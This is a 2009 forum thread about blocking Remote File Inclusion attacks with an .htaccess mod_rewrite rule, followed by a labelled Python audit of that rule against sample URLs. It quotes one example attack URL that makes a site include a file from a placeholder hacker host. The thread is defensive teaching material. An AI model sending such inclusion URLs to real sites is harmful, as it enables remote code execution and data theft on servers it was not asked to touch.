Insane Visions :: Viewing Topic - Security: Protecting from RFI Attacks
 



Elven6




Posted: Nov 26, 2009 - 11:12 pm

A webmaster's nightmare scenario: getting hacked! One way a hacker is able to target your website is by using a Remote File Inclusion attack. Basically, what this allows them to do is use security holes within your code to run external exploits. For example:

[QUOTE]http://www.yoursite.com/index.php?option=http://hackersite/hackingfile.txt[/QUOTE]

By running this script they can take your server down, delete files on your server, or even steal information. Fortunately there is a way to stop these attacks. I won't say completely, since nothing is ever 100% in programming (in this case they can encrypt the URL), but some assurance is better than none!

One way to solve the issue is using PHP scripts; however:

  1. They will only protect the file and not your server.
  2. It is taxing for your server to handle all those requests.


The alternative? We can use mod_rewrite to get the job done.

Open up your .htaccess file and insert the following code in your file.

[QUOTE]RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)[/QUOTE]

This will allow the server to identify such requests being sent to your server. Directly underneath this, insert the following line of code.

[QUOTE]RewriteRule ^(.+)$ - [F][/QUOTE]

There are various scripts that do essentially the same thing; some might do it better than others. This specific script is courtesy of PHP Freaks.

If you have alternatives you use, or have questions, comments, etc., feel free to post them below!



OneCMS: http://onecms.net
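
Added example (not part of the original post or of the PHP Freaks script): a Python check of which requests the RewriteCond above actually matches, run over constructed sample URLs. It assumes mod_rewrite tests the pattern against the raw query string while PHP percent-decodes each value before the script sees it; the function names and sample URLs are made up for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Pattern from the RewriteCond in the post. Assumption: mod_rewrite tests it
# against the raw query string, before any percent-decoding.
REWRITE_COND = re.compile(r"(.*)(http|https|ftp)://(.*)")

# Constructed sample requests, reusing the post's placeholder host names.
SAMPLES = [
    "http://www.yoursite.com/index.php?option=http://hackersite/hackingfile.txt",
    "http://www.yoursite.com/index.php?option=http%3A%2F%2Fhackersite%2Fhackingfile.txt",
    "http://www.yoursite.com/index.php?option=news&page=2",
    "http://www.yoursite.com/login.php?return=http://www.yoursite.com/forums",
]

def rule_blocks(url):
    """True if the posted RewriteCond matches the raw query string (403)."""
    return REWRITE_COND.search(urlsplit(url).query) is not None

def decoded_has_url(url):
    """True if a query value holds scheme:// once decoded, as PHP's $_GET sees it."""
    for pair in urlsplit(url).query.split("&"):
        value = unquote_plus(pair.partition("=")[2])
        if REWRITE_COND.search(value):
            return True
    return False

def audit(urls):
    """Label each URL: 'blocked' by the rule, 'missed' by it, or 'clean'."""
    report = []
    for url in urls:
        if rule_blocks(url):
            verdict = "blocked"
        elif decoded_has_url(url):
            verdict = "missed"
        else:
            verdict = "clean"
        report.append((url, verdict))
    return report

if __name__ == "__main__":
    for url, verdict in audit(SAMPLES):
        print(f"{verdict:8} {url}")
```

The last sample is a same-site return link, and the rule refuses it as well because it matches any URL in the query string.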





Elven6




Posted: Nov 26, 2009 - 11:21 pm

Ahh! Excuse the quote errors, can't find a way to edit old posts. :(



OneCMS: http://onecms.net





